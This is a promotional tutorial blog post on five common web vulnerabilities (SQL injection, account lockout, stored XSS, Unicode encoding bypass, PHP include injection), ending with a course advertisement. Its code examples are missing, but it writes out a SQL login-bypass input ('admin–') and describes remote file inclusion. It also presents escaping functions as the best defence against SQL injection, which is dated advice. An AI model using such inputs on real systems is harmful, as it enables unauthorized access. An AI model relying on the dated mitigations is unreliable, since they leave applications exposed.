Web Application Security: The 5 Most Common Security Vulnerabilities That Can Kill Your Startup

While creating a startup – either a website or a rich web application – you must observe some basic rules to ensure your users are adequately protected. To prevent a potential attack, you need to focus on the quality of the created code already at the programming stage. Here are only five of the dozens of possible attack scenarios:

1. SQL Injection

SQL Injection is the best-known type of attack, originating in the validation of input. It is most commonly used to exploit vulnerabilities of websites based on PHP and ASP. The attack consists of the insertion of unwanted SQL queries to an application’s input. If successful, this allows the attacker to add or delete database content and browse e-mails, passwords and personal information of website users. The SQL Injection-type susceptibility may occur if a website passes queries from untrusted sources to the database or generates them dynamically.

Example:

Let’s assume that login variables (login and password) are passed directly to SQL query through the POST method. A code excerpt responsible for logging users in that is vulnerable to attacks may look like this:


If a website user submits admin– in the user field, the executed SQL query will look as follows:


What has happened? The — character is going to be interpreted by our DBMS as a comment, resulting in the failure to complete the execution of the other part of the SQL query, which is password control. An attacker may exploit this to gain admin access to a service.

How to prevent the attack:

The most efficient protection against this type of attack is to filter user-provided data using the following functions: mysql_real_escape_string(), pg_escape_string(), and others. Numeric data should be converted using settype() or sprintf(), and then checked with is_numeric(), ctype_digit() for correct data format.

2. Account Lockout

The best illustration for this attack is the story of a user of one of the largest online auction websites. The user bid for an extremely well-priced item. 15 minutes before the auction’s closing, another user entered the bidding. Just before the listing ended, when the first user attempted to make his final offer, he was logged out from the service and received a message stating his account had been locked for 30 minutes, which excluded him from further bidding.

Why did the system act in this way?

The second bidder was able to see the user login of the first bidder, which was plainly displayed on the website. He made several attempts to log into the other user’s account, providing incorrect passwords. Trying to prevent a brute-force type of attack, the system locked out the user from his account after a limit of failed login attempts was reached. An attacker who uses the Account Lockout type of attack may be able to deny users access to their accounts.

How to prevent the attack:

Rather than locking out users from their accounts after a limit of failed login attempts is reached, you may consider requiring users to type in a Captcha code with each subsequent login attempt. This will protect the website from brute-force type of attacks without denying users access to their accounts.

Another solution is blocking a single IP address from logging into an account for a specified period of time. Still, it may happen that both the attacker and attacked user share the IP address, which will cause the normal user to be also denied service.

3. Stored XSS

In this type of attack, a script written by an attacker is taken from the database to which it had been previously injected. In contrast to the SQL Injection attack, the malicious code does not affect the functioning of the database but, following website rules, is passed on to the website’s user. The malicious code may be entered for example in an entry in the website comment box, and may be erroneously interpreted by users’ browsers as part of the website. This situation should never occur: the attacker should never be able to write in a script and pass it to the customer. An attack of this type may be exploited against all users of a website who do not suspect it had been infected with malicious script.

Example:

The following entry is submitted to a message board or in a comment:


or

How to prevent the attack:

Prevention against Stored XSS requires proper filtering of input. The best approach is to create a whitelist of characters allowed to be included in a field. If our website appears susceptible to Stored XSS attacks, adding the httpOnly option to outgoing cookies may be useful. In the majority of browsers this will block cookie theft by a script language (JavaScript) on the customer’s side, and consequently help prevent session hijacking. Setting the httpOnly flag cannot however be regarded as a security countermeasure: it will only protect you against the simplest of attacks.

4. Unicode encoding

The development of the ASCII character-encoding scheme was based on the letters found in English, which were considered universal. With time, however, the world wide web began to be utilised in countries with varied languages and alphabet systems. As one byte cannot hold all the characters found in all languages, a new encoding system, varied for different language groups, was introduced. The UNICODE standard was developed as a remedy for this situation. In this system each letter may be held by more than one byte. Because of this, a single encoding system may cover all the languages in the world.

Usage of the UTF-8 encoding, now widely used as the most popular UNICODE-based system, allows the potential intruder to insert filtered sequences (for example, ‘../’) in a number of ways. UTF-8 decoders that do not check characters for their validity may accept a specially-crafted sequence of bits that should be denied as one character (for example ‘/’).

Example:

Speaking of character-encoding, let us now look at the same links written in different encoding systems.


In different encoding systems, characters will hold different positions. As a consequence, filtering input through blacklisting to exclude forbidden characters would require allowing for all possible encoding sets.

The best prevention against this attack is to convert all the provided data to the same encoding format. Only then can we audit its validity and reject unwanted characters.

5. PHP Injection

Programming languages have functions that enable executing external code. In PHP these are: require(), include(), eval(), and preg_replace with the modifier /e, which treats placeholder strings as PHP code. If user-provided data is passed to one of such functions, PHP code injection may occur.

Example:

Let’s assume that the website has a very simple controller that relies on the variable file sent via the GET method to submit the content of a specified file.


As we can see, the variable file passed by the GET method is further passed to the function include(). It is a serious error which may be exploited by attackers in a number of ways.

Any code may be executed now, for example:

The path to malicious code is passed as a parameter of the function included. The script will be executed by the attacked server.

How to prevent the attack:

Server configuration may help. The option allow_url_fopen can block accessing files from external servers for the functions file_get_contents, fopen, include, and require. The best way to protect against such attacks is to not pass user-provided input data to functions that execute script. Filtering input strings and creating a whitelist of files that may be included or executed as parameters of the functions include, require, etc., is essential.

Testing your security

Checking the website manually for known security holes is certainly good practice. To quicken this time-consuming process you might utilise a number of tools designed to automatise the search. Next we discuss three testing methods.

Black Box Testing

Black box testers only possess information about the functionality of a website, and have no knowledge of the application’s internal structure. They know only which input should be entered, and check whether the returned output is correct.

Wapiti is an example of black box testing software.

White Box Testing

White box testing is based on the opposite principle. The testers have full access to the source code, and security holes and vulnerabilities are detected through reading the code. RATS is an example of automatised white box testing software.

Grey Box Testing

A combination of the two methods discussed earlier. This technique requires us to have access to the full documentation created during application development, but no access to the source code is given. Thanks to this method, we are able to adjust the level of specificity for testing variables in black box testing.

Overall

The five selected types of attacks have not been covered in depth, and only few basic scenarios have been discussed: there are certainly many more possible combination attacks threatening your business. Any programmer, project manager or startup creator must recognise the importance of protecting their applications. Taking insufficient care of simple security measures may discredit even the most valuable web service and frighten off customers for good.

Interested in security?

Find out more about IT security in our Hacking School courses available on the Udemy learning platform:

Website Hacking in Practice

Hacking School Training

Use the coupon code: UBLOG and save 40%!

image08About the authors:

The Hacking School trained more than 25000 people world-wide. Every course is prepared by people who are professionals in what they do. Authors are well known in the world of computer systems’ security.

Everyday we deal with the analysis of computer security, network infrastructure and applications. We have extensive experience in the field of computer intelligence and computer forensics. We use custom and unconventional methods of testing the security, which guarantee the highest quality services.

We had the pleasure to work with major corporations throughout Western Europe, North America and Russia. We assure our clients complete anonymity, privacy and security of  entrusted information. Together, with a group of trusted experts, we will solve every problem related to computer systems security and now we want to share our knowledge with you.